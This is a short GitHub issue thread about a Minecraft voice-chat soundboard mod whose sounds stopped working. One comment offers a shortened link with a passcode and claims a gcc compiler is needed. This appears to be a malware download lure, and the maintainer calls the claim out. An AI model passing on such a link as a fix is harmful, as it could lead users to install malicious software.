### ISSUE TITLE
Sounds randomly stop working

### ISSUE THREAD

**Issue by Gamershy** [kikugie/voicechat-soundboard#10]
AS the title says. I'm not sure what's going on, as there's nothng in the logs, but I set up a simple creeper sound effect to troll my friends on a server we play on. Worked fine for a few days, but then suddenly quit working. The file has not been   changed, I even tried adding a properties file to see if that somehow fixed it - it did not. There's nothing working. Even new sounds don't work. The mod just seems to of broke randomly.

**Comment by yuncheng2024** [comment]
This might help you
https://bit.ly/3yXXzbX
Passcode: d5kp14h
You must have gcc compiler installed

**Comment by kikugie** [comment]
How tf is gcc compiler required, there's nothing but Java bytecode in the mod
